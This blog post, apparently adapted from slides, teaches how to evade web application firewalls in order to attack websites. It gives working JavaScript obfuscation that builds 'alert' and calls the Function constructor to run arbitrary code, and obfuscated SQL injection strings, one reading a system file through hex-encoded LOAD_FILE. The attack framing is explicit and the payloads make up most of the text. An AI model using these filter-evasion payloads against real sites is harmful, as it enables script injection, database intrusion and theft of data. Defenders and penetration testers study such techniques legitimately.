Hey folks Today i will be teaching you how can you bypass Web A pplication Firewall to attack Websites and Execute your malicious code.
What are WAFs?
1.Emerged from IDS/IPS focused on HTTP
protocol and HTTP related attacks
2.Usually contain a lot of complex regexp rules
to match
3.Support special features like cookie encryption,
CSRF protection, etc.
4.Except of free mod_security they are quite
expensive (and often there is no correlation
between the price and their filtering capabilities)
WAF filter rules
1.Directly reflects WAF effectiveness
2.For most WAF vendors they are closely
guarded secrets – most determined attackers
are able to bypass them without seeing the
actual rules
3.Opensource WAFs (mod_security, PHPIDS)
have open source rules which is better for
more scrutiny by skilled penetration testers
Obfuscation TOOLS You NEED
Hackconvertor
Download Hackbar
Download Malzilla
Your imagination :)
Let's bypass WAF!
Example situation: WAF blocks alpha
characters and numbers (probably not a very
real situation, just proofofconcept :)
XSS obfuscation
Allows only few special characters (){}_=[];$”!
+<>
Generating numbers
+[] //0
++[[]][+[]] //1
+!+[] //1
++[++[[]][+[]]][+[]] //2
!+[]+!+[] //2
++[++[++[[]][+[]]][+[]]][+[]] //3
!+[]+!+[]+!+[] //3
Generate string “alert” without using
any alphanumeric characters
Let's start with 'a'
What Javascript object contains 'a'?
We can use 'NaN' (Not a Number)
Access empty string with index “0” (undefined)
and convert to number (NaN)
+[][+[]] // result: NaN
Generating 'a' character
NaN[1]='a'
++[[]][+[]] //1
++[][+[]]+[] // result string: NaN
(+[][+[]]+[])[++[[]][+[]]] //a
Generating 'l' character
Use boolean false
We can use ! (NOT) operator
e.g. ''==0 //true
Use blank array (string) and then NOT operator
to obtain boolean, wrap with [] and convert it to
string
([![]]+[]) //string “false”
Generating 'l' character
++[++[[]][+[]]][+[]] //2
([![]]+[]) //string “false”
'false'[2] = ([![]]+[])[++[++[[]][+
[]]][+[]]] // 'l'
Generating 'e' character
It's easy, we can use boolean true
([!![]]+[]) // string 'true'
++[++[++[[]][+[]]][+[]]][+[]] //3
'true'[3] = ([!![]]+[])[++[++[++
[[]][+[]]][+[]]][+[]]] //e
Generating 'r' character
It's easy, we can use boolean true
([!![]]+[]) // string 'true'
++[[]][+[]] //1
'true'[1] = ([!![]]+[])[++[[]][+
[]]] //r
Generating 't' character
It's easy, we can use boolean true
([!![]]+[]) // string 'true'
+[] //0
'true'[0] = ([!![]]+[])[+[]] //t
And now we have 'alert' string!
(+[][+[]]+[])[++[[]][+[]]]+([![]]+
[])[++[++[[]][+[]]][+[]]]+([!![]]+
[])[++[++[++[[]][+[]]][+[]]][+[]]]+
([!![]]+[])[++[[]][+[]]]+([!![]]+
[])[+[]] //string 'alert'
How to execute the code of our choice?
It is necessary to return window object to
access all properties of window
If you can access to a constructor, you can
access Function constructor to execute
arbitary code
The shortest possible way to get window is:
alert((1,[].sort)()) // shows
window object !
How to call any arbitrary
Javascript function
Using the array constructor (accessing the
constructor twice from an array object returns
Function):
[].constructor.constructor(“alert(1
)”)()
We need to generate the rest 'c','n','u' letters,
gain them from the output of [].sort function:
function sort() { [native code] }
SQL obfuscation
What is obfuscation of SQL injection vector?
Different DBMS have different SQL syntax,
most of them support Unicode, Base64, hex,
octal and binary representation, escaping,
hashing algorithms (MD5, SHA1)
Many “blacklisted” characters can be replaced
by their functional alternatives (0xA0 in MySQL)
Obfuscated comments – it is difficult to
determine what is a comment and what is not
SQL obfuscation examples
SELECT CONCAT (char
(x'70617373',b'11101110110111101110010011
00100'))
s/*/e/**//*e*//*/l/*le*c*//*/ect~~/**/1
SELECT
LOAD_FILE(0x633A5C626F6F742E696E69)
(M)
SELECT(extractvalue(0x3C613E61646D696E3
C2F613, 0x2F61))
How To Bypass Modern WAF's :2014
Subscribe to:
Post Comments (Atom)
Posts
0 comments:
Post a Comment